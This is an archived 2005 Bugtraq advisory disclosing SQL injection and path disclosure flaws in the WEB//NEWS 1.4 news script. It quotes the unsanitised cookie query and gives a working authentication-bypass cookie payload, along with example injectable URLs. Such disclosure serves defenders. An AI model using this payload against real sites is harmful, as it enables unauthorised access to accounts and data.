lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050907154952.31448.qmail@securityfocus.com>
Date: 7 Sep 2005 15:49:52 -0000
From: r.verton@...il.com
To: bugtraq@...urityfocus.com
Subject: [NewAngels Advisory #5] Stylemotion WEB//NEWS 1.4 Vulnerabilities


[NewAngels Advisory #5] Stylemotion WEB//NEWS 1.4
=============================================================================

Software: WEB//NEWS 1.4
Type: SQL Injections, Path Disclosure
Risk: High

Date: Sep. 1 2005
Vendor: Stylemotion


Credit:
=======
Robin 'onkel_fisch' Verton
http://www.it-security23.net

Description:
============
WEB//News is a Newsscript which features like an CMS


Vulnerability:
==============

In the modules/startup.php

$_USER=$db->first("SELECT * FROM ".PRE."_user LEFT JOIN ".PRE."_group USING (groupid) 
		      WHERE 
			( userid='".$_COOKIE['wn_userid']."' AND password='".$_COOKIE['wn_userpw']."' ) 
		      LIMIT 1");

As we can see, the $_COOKIE paramter is not checked. Below i've added how you have to set the Cookies
to take advantage of these vulnerability (send this to index.php):

wn_userid=1; wn_userpw=0' OR '1'='1

Path Disclosure:
No file in he /actions dir is testet if it is directly included.
Example:
/actions/cat.add.php?name=A

Nearly every REQUEST variable is not checked so there are a few of SQL-Injections availiable

A few Examples:
/include_this/news.php?cat=[SQL]
/include_this/news.php?id=[SQL]
/print.php?id=[SQL]
/include_this/news.php?stof=[SQL]

Greets:
==============
Whole NewAngel Team, CyberDead, Modhacker, deluxe


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ